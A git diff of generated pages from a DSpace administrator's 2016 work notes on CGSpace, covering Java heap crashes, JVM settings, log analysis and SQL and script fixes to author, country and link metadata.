@@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- From the activity control panel I can see 58 unique IPs hitting the site concurrently, which has GOT to hurt our stability
- A list of all 2000 unique IPs from CGSpace logs today:
-# grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
+# grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
- Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc… do we have any real users?
- Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:
@@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
-Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
- And after that I see a bunch of “pool error Timeout waiting for idle object”
- Later, near the time of the next crash I see:
@@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
-java.util.Map is an interface, and JAXB can't handle interfaces.
+java.util.Map is an interface, and JAXB can't handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
- Then 20 minutes later another OutOfMemoryError:
-Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
- Perhaps these particular issues are memory issues; the Munin graphs definitely show some weird purging/allocating behavior starting this week
@@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
- Oh great, the configuration on the actual server is different than in configuration management!
- Seems we added a bunch of settings to the
/etc/default/tomcat7
in December, 2015 and never updated our ansible repository:
-JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
+JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
- So I’m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)
- Increased JVM heap to 4096m on CGSpace (linode01)
@@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
-Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
+Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@@ -443,7 +443,7 @@ Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.H
- I bumped the heap space from 4096m to 5120m to see if this is really about heap space or not.
- Looking into some of these errors that I’ve seen this week but haven’t noticed before:
-# zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
+# zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
113
- I’ve sent a message to Atmire about the Solr error to see if it’s related to their batch update module
@@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
- Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: https://jira.duraspace.org/browse/DS-2809
- We just need to set this in
dspace/solr/search/conf/schema.xml
:
-<solrQueryParser defaultOperator="AND"/>
+<solrQueryParser defaultOperator="AND"/>
- It actually works really well, and searches return far fewer hits now (before, after):
@@ -533,12 +533,12 @@ OCSP Response Data:
Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman
This author has a few variations:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
-len, S%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
+len, S%';
- And it looks like
fe4b719f-6cc4-4d65-8504-7a83130b9f83
is the authority with the correct ORCID linked
-dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
UPDATE 101
- Hmm, now her name is missing from the authors facet and only shows the authority ID
@@ -547,7 +547,7 @@ UPDATE 101
- On a clean snapshot of the database I see the correct authority should be
f01f7b7b-be3f-4df7-a61d-b73c067de88d
, not fe4b719f-6cc4-4d65-8504-7a83130b9f83
- Updating her authorities again and reindexing:
-dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
UPDATE 101
- Use GitHub icon from Font Awesome instead of a PNG to save one extra network request
@@ -564,8 +564,8 @@ UPDATE 101
- Minor fix to a string in Atmire’s CUA module (#280)
- This seems to be what I’ll need to do for Sonja Vermeulen (but with 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0 instead on the live site):
-dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
-dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
+dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
- And then update Discovery and Authority indexes
- Minor fix for “Subject” string in Discovery search and Atmire modules (#281)
@@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
- DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console
- People on DSpace mailing list gave me a query to get authors from certain collections:
-dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
+dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
2016-09-30
- Deny access to REST API’s find-by-metadata-field endpoint to protect against an upstream security issue (DS-3250)
diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html
index 365520619..fa3edb15e 100644
--- a/docs/2016-10/index.html
+++ b/docs/2016-10/index.html
@@ -42,7 +42,7 @@ I exported a random item’s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
-
+
@@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
- CGSpace crashed a few times today
- Generate list of unique authors in CCAFS collections:
-dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
+dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
2016-10-05
- Work on more infrastructure cleanups for Ansible DSpace role
@@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
- Re-deploy CGSpace with latest changes from late September and early October
- Run fixes for ILRI subjects and delete blank metadata values:
-dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 11
- Run all system updates and reboot CGSpace
@@ -211,7 +211,7 @@ DELETE 11
- A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:
-
$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
+$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
- One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)
@@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA
Start looking at batch fixing of “old” ILRI website links without www or https, for example:
-dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
+dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
- Also CCAFS has HTTPS and their links should use it where possible:
-dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
+dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
- And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):
-dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
+dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
- Turns out there are shit tons of varieties of this, like with http, https, www, separate </img> tags, alignments, etc
- Had to find all variations and replace them individually:
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
- Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)
- And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc
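The sixteen near-identical updates above differ only in scheme, the optional www, extra attributes, and how the tag is closed. A minimal sketch of collapsing those variations into one pattern per icon follows, using sed so it can be tried without touching the database. The `to_font_awesome` helper name and the sample input are assumptions for illustration; a similar pattern might work in PostgreSQL's regexp_replace, but that is untested here.

```shell
#!/bin/sh
# Hypothetical helper: rewrite any variant of the old RSS/email <img> icons
# in the given HTML snippet to the Font Awesome spans used in the updates.
to_font_awesome() {
    # https?        -> http or https
    # (www\.)?      -> with or without www
    # [^>]*         -> any extra attributes (align, valign) and a trailing "/"
    # (</img>)?     -> optional separate closing tag
    printf '%s\n' "$1" | sed -E \
        -e 's#<img[^>]*src="https?://(www\.)?ilri\.org/images/Iconrss2\.png"[^>]*>(</img>)?#<span class="fa fa-rss fa-2x" aria-hidden="true"></span>#g' \
        -e 's#<img[^>]*src="https?://(www\.)?ilri\.org/images/email\.jpg"[^>]*>(</img>)?#<span class="fa fa-at fa-2x" aria-hidden="true"></span>#g'
}

# Made-up sample mixing two of the variations seen in the database.
to_font_awesome '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/> <img align="left" src="https://ilri.org/images/email.jpg"></img>'
```

The trade-off is that a loose pattern like this could also match variations nobody has looked at yet, so it would be worth running the equivalent select first to review what it catches.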
@@ -321,9 +321,9 @@ UPDATE 0
- Fix some messed up authors on CGSpace:
-
dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
+dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
UPDATE 10
-dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
+dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
UPDATE 36
- I updated the authority index but nothing seemed to change, so I’ll wait and do it again after I update Discovery below
@@ -336,7 +336,7 @@ UPDATE 36
- Fix a bunch of countries in Open Refine and run the corrections on CGSpace:
-$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
+$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
- Run a shit ton of author fixes from Peter Ballantyne that we’ve been cleaning up for two months:
@@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
- Run a few URL corrections for ilri.org and doi.org, etc:
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
- I skipped metadata fields like citation and description
diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html
index 08b5166b7..9926638c3 100644
--- a/docs/2016-11/index.html
+++ b/docs/2016-11/index.html
@@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire’s Listings and Reports module
Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
"/>
-
+
@@ -160,7 +160,7 @@ java.lang.NullPointerException
- Horrible one liner to get Linode ID from certain Ansible host vars:
-$ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
+$ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
- I noticed some weird CRPs in the database, and they don’t show up in Discovery for some reason, perhaps the
:
- I’ll export these and fix them in batch:
@@ -170,7 +170,7 @@ COPY 22
- Test running the replacements:
-$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
- Add AMR to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (#288)
@@ -200,11 +200,11 @@ COPY 22
Helping Megan Zandstra and CIAT with some questions about the REST API
Playing with find-by-metadata-field, this works:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
- But the results are deceiving because metadata fields can have text languages and your query must match exactly!
-dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
